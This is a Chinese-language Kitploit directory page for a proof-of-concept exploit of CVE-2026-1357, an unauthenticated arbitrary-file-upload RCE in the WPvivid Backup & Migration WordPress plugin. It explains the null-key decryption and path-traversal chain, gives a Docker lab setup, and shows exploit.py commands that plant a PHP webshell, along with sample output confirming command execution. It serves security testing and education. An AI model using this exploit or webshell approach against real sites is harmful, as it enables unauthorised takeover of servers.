Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/halilkirazkaya/cve-2026-1357
漏洞分析漏洞利用Web应用程序漏洞利用Web安全渗透测试学习与教育实验室与实践
GitHubhalilkirazkaya/cve-2026-1357

CVE-2026-1357

# CVE-2026-1357 — WPvivid Backup & Migration ≤ 0.9.123 未认证远程代码执行漏洞利用

查看仓库
14366个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-1357 — WPvivid备份与迁移远程代码执行

未经身份验证的任意文件上传 → 远程代码执行

字段值
CVECVE-2026-1357
CVSS9.8(严重)
插件WPvivid Backup & Migration
受影响版本≤ 0.9.123
修复版本0.9.124
发现者Lucas Montes (NiRoX)
PoC作者halilkirazkaya

概述

WPvivid Backup & Migration 插件(≤ 0.9.123)存在一个严重漏洞,允许未经身份验证的攻击者向服务器上传任意PHP文件,从而导致远程代码执行(RCE)。

该利用链结合了两个缺陷:

1. 加密失效

该插件通过 wpvivid_action=send_to_site 钩子处理远程备份传输。在解密会话密钥时,对于格式错误的RSA密钥,openssl_private_decrypt() 会返回 false。插件未检查此返回值,并将 false 传递给 phpseclib v1 的 Crypt_Rijndael,后者将其视为16字节的空密钥(\x00 × 16),采用CBC模式和空IV。

2. 路径遍历

解密后JSON载荷中的 name 参数未经净化处理。攻击者可以使用 ../ 序列将PHP文件写入受限制的备份目录之外,进入公开可访问的 wp-content/uploads/ 目录。

限制条件

wpvivid_api_token 必须在插件设置中已生成且未过期。


设置

1. 下载存在漏洞的插件

下载并解压 WPvivid Backup & Migration v0.9.123(存在漏洞的版本):

root@kitploit:~
wget https://downloads.wordpress.org/plugin/wpvivid-backuprestore.0.9.123.zip
unzip wpvivid-backuprestore.0.9.123.zip

这将创建 wpvivid-backuprestore/ 目录,该目录通过 docker-compose.yml 挂载到Docker容器中。

2. 启动实验环境

root@kitploit:~
docker compose up -d

3. 配置WordPress

  1. 打开 http://localhost 并完成WordPress安装。
  2. 转到 插件 → 已安装插件,激活 WPvivid Backup & Migration。
  3. 转到 WPvivid → 设置 → 自动迁移,点击 生成 创建一个密钥(这会启用存在漏洞的代码路径)。

4. 安装依赖

root@kitploit:~
pip install -r requirements.txt

用法

root@kitploit:~
# 仅检查漏洞(上传一个无害的txt文件并验证MD5)
python3 exploit.py -u http://TARGET-URL -c

# 上传Shell并运行默认命令 (id)
python3 exploit.py -u http://TARGET-URL -s

# 上传Shell并运行自定义命令
python3 exploit.py -u http://TARGET-URL -s "whoami"

示例输出(检查模式)

root@kitploit:~
[*] 目标       : http://localhost/
[*] 模式       : 检查
[*] 上传路径   : ../uploads/h8xq9b3v2z1c.txt

[+] 正在生成加密载荷(AES-128-CBC,空密钥 + 空IV)...
[+] 载荷大小   : 392 字节 (base64)
[+] 通过 wpvivid_action=send_to_site 发送利用...
[+] 响应       : 200
[+] 响应体     : {"result":"success","op":"finished"}

[+] 验证于: http://localhost/wp-content/uploads/h8xq9b3v2z1c.txt
[✓] 漏洞确认!文件内容与MD5匹配。

示例输出(Shell模式)

root@kitploit:~
[*] 目标       : http://localhost/
[*] 模式       : Shell
[*] 上传路径   : ../uploads/wp6h68xnt1tyzbfx8qp3qdbx.php
[*] 验证命令   : id

[+] 正在生成加密载荷(AES-128-CBC,空密钥 + 空IV)...
[+] 载荷大小   : 392 字节 (base64)
[+] 通过 wpvivid_action=send_to_site 发送利用...
[+] 响应       : 200
[+] 响应体     : {"result":"success","op":"finished"}

[+] 验证于: http://localhost/wp-content/uploads/wp6h68xnt1tyzbfx8qp3qdbx.php?cmd=id
[✓] RCE确认!
[✓] 输出:
uid=33(www-data) gid=33(www-data) groups=33(www-data)

参考

  • Wordfence 安全公告
  • 原始PoC by LucasM0ntes

免责声明

本工具仅供授权的安全测试和教育用途。未经授权访问计算机系统属于违法行为。请负责任地使用。

下载工具